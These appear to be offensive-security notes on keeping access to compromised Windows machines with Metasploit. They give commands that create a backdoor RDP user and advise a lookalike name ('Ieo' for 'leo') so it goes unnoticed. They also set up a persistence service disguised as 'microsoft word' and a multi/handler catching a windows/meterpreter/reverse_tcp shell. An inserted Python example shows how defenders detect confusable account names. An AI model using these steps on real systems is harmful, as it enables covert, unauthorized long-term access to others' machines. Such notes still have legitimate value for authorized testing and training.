Persistence
Persistence via RDP:
Create a new user in meterpreter:
run getgui -e -u asem -p Hacker_123321
Or use the MSF Module:
post/windows/manage/enable_rdp
Either one creates a user and enables RDP on the target with a username and password of your choice.
Then connect using xfreerdp.
Make sure to name the new user so it blends in with the other users and isn't sus.
E.g. if there's a user called "leo" (with a lowercase L), we create our backdoor user named "Ieo" (with a capital i).
These two names are different.
Just make sure the password is long and contains numbers and symbols, to satisfy the password policy.
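From the defender's side, the lookalike-name trick above can be caught by collapsing confusable characters before comparing account names. This is an added example, not part of the original notes; the confusables table, the function names and the sample account list are assumptions constructed for illustration.

```python
from collections import defaultdict

# Assumed, deliberately small confusables table: characters that render alike
# in common UI fonts are mapped onto one representative. Extend as needed.
CONFUSABLES = str.maketrans({
    "I": "l", "1": "l", "|": "l",   # capital i, digit one, pipe vs lowercase L
    "O": "o", "0": "o",             # letter O vs zero
})

def skeleton(name):
    """Collapse visually confusable characters, then fold case."""
    return name.translate(CONFUSABLES).lower()

def find_lookalikes(accounts):
    """Return groups of distinct account names that share one skeleton."""
    groups = defaultdict(set)
    for name in accounts:
        groups[skeleton(name)].add(name)
    return sorted(sorted(g) for g in groups.values() if len(g) > 1)

def imitates(new_name, existing):
    """Existing accounts that a newly created name could be mistaken for.

    Intended for triage of account-creation alerts (Windows Security
    event ID 4720) against a baseline of known accounts.
    """
    key = skeleton(new_name)
    return [n for n in existing
            if skeleton(n) == key and n.lower() != new_name.lower()]

# Constructed sample data: the kind of list `net user` or Get-LocalUser returns.
SAMPLE_ACCOUNTS = ["Administrator", "Guest", "leo", "Ieo", "maria"]

if __name__ == "__main__":
    for group in find_lookalikes(SAMPLE_ACCOUNTS):
        print("confusable account names:", ", ".join(group))
```

Run it against the full local and domain account list, and call `imitates()` on every newly created account so a lookalike is flagged at creation time.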
MSF Module:
search platform:windows persistence
The following module creates a service that gives us access to the target system all the time:
exploit/windows/local/persistence_service
- Choose a normal service name:
set SERVICE_NAME microsoft word
- Don't forget to set the session.
If all sessions are killed we can still gain access like this:
use multi/handler
- Choose the same payload we used in the persistence service module above:
set PAYLOAD windows/meterpreter/reverse_tcp
- Choose the same LHOST and LPORT as the persistence service module.
- Then just hit run or exploit and we get a session, because the service is running on the target and always listening.